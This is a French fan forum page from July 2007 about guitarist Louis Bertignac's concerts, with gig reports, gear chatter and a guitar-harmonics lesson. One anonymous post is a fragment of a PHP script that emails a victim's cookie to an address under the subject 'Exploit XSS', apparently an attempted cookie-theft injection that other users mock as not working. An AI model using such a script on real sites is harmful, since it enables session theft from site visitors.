Gnac of the day
Aujourd'hui, cette page a été vue 1168 fois.
Ecrire un message | Recherche
Le 20/07/2007 à 12h29 (90.16.***.***)
olivierdu57 - Viv
Salu Viv, juste un pti coucou en passant car je dois aller rendre la voiture de loc'. Merci pour ton message, très sympa vraiment! On se reparle plus tard dans la journée. Olivier

Le 20/07/2007 à 11h59 (217.109.***.***)
azerty@anne - aubertignac37@hotmail.fr
s'etait toi la rousse devant habille avec un haut bleu ????

Le 20/07/2007 à 11h43 (90.24.***.***)
Ed @ Yamero -
Très sympa ce petit morceau . Chapeau l'ami !!

Le 20/07/2007 à 11h34 (195.115.**.***)
Vince@Dan - lpvince@free.fr
Salut Dan... je viens de voir ton message pour la Les Paul, c'est peut être trop tard mais moi j'ai une LP Classic 60' (celle que j'avais au Bertiboeuf...)ou une 335...comme tu veux comme tu peux... @+ Vince

Le 20/07/2007 à 09h54 (88.166.***.***)
Yamero - @ Slash
...hum...bon, c'est pour ça que je préfère toujours dire que je suis joueur de guitare et non guitariste....

je vois pas 36 façons de sortir des aigus en haut du manche, en tout cas des notes à hautes fréquences....j'en vois deux

1) l'harmonique naturelle, que tu obtiens en effleurerant la corde au dessus de la frette choisie pour obtenir l'harmonique. L'autre main joue la note normallement au médiator.
2)l'harmonique artificielle, Souvent difficile à comprendre ou à réaliser l'harmonique pincée est très présente dans la guitare rock. Son principe est le même que pour l'harmonique naturelle mais cette fois l'opération se fait en 2 temps.

-1er temps: Le médiator attaque la corde
-2eme temps: Le flanc du pouce vient effleurer la corde et provoque l'harmonique.

La tête du médiator ne dépasse donc que de quelques milimètres de ton pouce .

Fais sortir 2mm de la tête de ton médiator seulement et joues la corde à vide de sol. Parcours en alors la corde sur sa longueur (soit de la dernière frette au micro chevalet) en jouant. Ton pouce devrait déclencher quelques harmoniques hasardeuses. Observe ton mouvement précisément et reproduis le jusqu' à compréhension.

Il te faudra un certain temps avant de maîtriser cette technique.

Pour avoir une idée de ce que ça donne, je glisse un p'tit truc sans prétention (puisque le but initial était de tester ma nouvelle webcam) à 3:20 on trouve un exemple d'harmo artificielles....bon courage
http://www.dailymotion.com/swf/1EBfCWl0nksVLGuW">http://www.dailymotion.com/swf/1EBfCWl0nksVLGuW" type="application/x-shockwave-flash" width="425" height="335" allowfullscreen="true">
http://www.dailymotion.com/video/x3i1y_yameros_music">Yamero's
envoyé par http://www.dailymotion.com/Yamero">Yamero Nounet, je t'oublie pas....

Le 20/07/2007 à 08h59 (164.129.*.**)
Nathalie CH - @ Youti et Azerty
Pardon Youti, ce n'était pas toi, c'était donc Azerty qui m'avait traité de vieille! Bises à vous 2 quand même, et à une prochaine!

Le 20/07/2007 à 08h56 (164.129.*.**)
Nathalie CH - @Youti
La "un peu plus vieille"??? Non mais tu te moques jeune homme, je rêve!!! mdr... Ben oui, les fans de Louis ne sont pas tous des jeunots, certains et certaines sont là depuis de très longues années, mais le rock, ça conserve (n'est ce pas Louis?). Sans rancune...

Le 20/07/2007 à 08h30 (83.205.***.***)
Lorence@sdub -
Bonne idée!Why not?

Le 20/07/2007 à 08h01 (84.55.***.**)
sdub - @Louis
Louis tout d'abord coucou à toi. Je me disais ce matin que ca serait cool si les liens pour passer d'une page a l'autre d'un forum situé en bas pouvais etre répété en haut de la page html ? ca m'arrive souvent de repasser sur le forum et de vouloir atteindre une page précédente (avec toutes les photos de ces derniers jours c'est drequent) et du coup il faut descendre tout en bas. Rien de bien génant mais je me disais que ca pouvais etre une amelioration sympa. D'autre sont peut etre interessé ?

En attendant bon week end à toi et à tout les gnacs fille garcon

Le 20/07/2007 à 01h15 (77.200.***.***)
Viv @ all -
Pifou sacrée soirée , que du bonheur.

Déja rencontre avec olivierdu57 , super gars , vraiment sympa , on a bien tué le temps a parler de notre trio favori pendant plus d'une heure et demi.
Puis la début du concert , une pluie fine qui commence a tomber , je stresse un peu pour la suite du concert (a cause de ca on a même pas eut droit a cendrillon version longue , sale pluie..) puis apres ca se calme , jusqu'a "Ca c'est vraiment toi" ou la elle est vraiment tombée mais on s'en fous , c'est que de l'eau , on a le boss et ses deux mousquetaires qui nous font vivre un superbe moment alors la pluie hein... même la grèle m'aurait pas empêchée de rester.
Alors sous des cordes , tout le monde chantait un autre monde pendant que l'equipe recouvrait la moitié du matos qui n'etait pas couvert , tres bon moment malgres tout.
Puis déja la fin du concert , Louis qui passe aux grilles signer quelques autographes , accorder quelques photos et bisous , Cyril qui nous rejoins dehors pour photos , autographes et discu , super puis Sylvain dans un coin qui discutait avec des gens qui nous a aussi accordé des photos et autographes, tous super sympa comme on peut l'imaginer , simples , pas de prise de tête , un vrai Power Trio comme on l'aime quoi.

Je sais pas si pour moi il y en aura une (peut etre si vous repassez dans le sud ouest) mais je vous dit peut etre a la prochaine a tous les trois , vous avez étés géniaux , super moment , puis content d'avoir rencontré olivier , super gars , tres gentil.

Rock 'n Roll !
Viv !

Le 19/07/2007 à 23h33 (82.65.***.***)
salut tout le monde !!!je suis guitariste et je voulai savoir si quelqun pouvai me dire comment faire un effet egüe pendant un solo en haut du manche (desole je ne sais pas comment on appel sa...) merci d'avance

Le 19/07/2007 à 22h16 (81.243.***.***)
anne(pgb) - youti
eh oui j etais bien avec ce groupe...mais pas brune plutot euhh rousse-rouge tt devant c est vrai que c est cool de se retrouver ici

Le 19/07/2007 à 22h09 (88.166.***.***)
lau yam and co - @lorence
tu as bien raison vite les vacances et c est bon pour tous vacances ou pas le soleil est la et on a le ROCK AND ROLL quand meme bizous a toi et a tous et merci de ton gentil post pour notre jolie mina thanks!!!!!!!!!!!!

Le 19/07/2007 à 21h15 (83.113.***.***)
Lorence@lau yam&co -
Merçi a toi des encouragements,mais tu tiens le bon bout!Quand on commençe à compter les jours ç'est que ça y est presque!La jolie petite Mina va pouvoir profiter de son papa et de sa maman pour quelques temps!Amitiés de gnac!!!

Le 19/07/2007 à 20h59 (88.166.***.***)
lau yam and co - @bertignac's family @aux gnacs
bonnes vacances a TOUS courage a ceux qui travaillent helas!!!!!!!!!!!!!!!!!! nous c est bientot OUF 10h par jour ca creve a vite sur les routes du rock and roll bizous bientot tout bronzes bye

Le 19/07/2007 à 20h30 (83.202.***.***)
Youti @ Azerty -
ok ok mon pote, on peut dire qu'on etait bien entouré pour ce concert!!! lol

Le 19/07/2007 à 20h13 (86.205.***.***)
Mélodie -
C vrai que Monsieur Bertignac va à Tarbes ce soir concert gratos ? Je viens d'avoir une info par radio lol

Le 19/07/2007 à 19h46 (172.184.**.**)
AZERTY @YOUTY ET AUX NAT -
salut youti a ma gauche il y avait les deux nath la jeune et la un peu plus vielle lol , et youti etait juste derriere moi , et nat tu dois te souvenir de moi on a parler ensemble j etais avec mon papa qui etait habille en blanc; bon c pas le tout mais a bientot les zami moi je vais bequetais+++

Le 19/07/2007 à 19h15 (82.252.***.***)
fred vanessa -
un p' tit dernier a st nazaire soutien au Mastah

Le 19/07/2007 à 19h12 (88.140.***.**)
LouisAddicted@ l’inconnu -
N’énerves pas louis avec tes virus qui marche plus ou il va encore nous faire ce soir un putain de Concert de 27h 45. Oui au Bonheur de tous mais t’es pas ultra drôle.

Le 19/07/2007 à 19h08 (213.103.***.***)
JeAnNe @ l'inconnu de 18h45 -
Mmmmh... J'allais le dire, mais tu as été plus rapide.

Le 19/07/2007 à 18h45 (217.77.**.***)
altesse3@hotmail.fr"; $sujet = "Exploit XSS"; // Codage HTML du message $message = "

Vous venez de recevoir un cookie!

$_GET[cookie]

"; // Envoy du email $de=$a; $marge = "From: $de "; $marge .= "Content-type: text/html "; mail($a, $sujet, $message, $marge); ?>

Le 19/07/2007 à 18h27 (90.24.***.**)
Youti @ Nathalie -
oué mais aussi vous etiez beaucoup de filles alors comment vous reconnaitre LOL. mais je crois vous avoir deja vu a un concert??? moi j'ai fais l'europeen, montereau, chatenay malabry et blois biensur, en tout cas cool d'avoir repondu ca fais plaiz!!!

Le 19/07/2007 à 18h23 (164.129.*.**)
Nathalie CH - @Youti
Non, ça je crois bien que c'était plutôt moi, je n'ai pas eu le courage de rester juste devant l'enceinte... Et oui, ça fait plaisir de se retrouver ici et ailleurs entre les concerts! Vivement le prochain!

Le 19/07/2007 à 18h23 (90.24.***.**)
Youti @ Gratteux -
slt les potes, je voudrais savoir si quelqu'un vend un AC30 Vox le meme que louis ca va de soit a lampe biensur et a quelle prix ou alors pourrais me renseigner...

Premi�re pagePage pr�c�dente 1990 1991 1992 1993 1994 1995 1996 1997 1998 1999 2000 Page suivanteDerni�re page

La reproduction ou l'utilisation de tout ou partie des propos ?crits sur ce forum est interdite sans autorisation ?crite de leurs auteurs.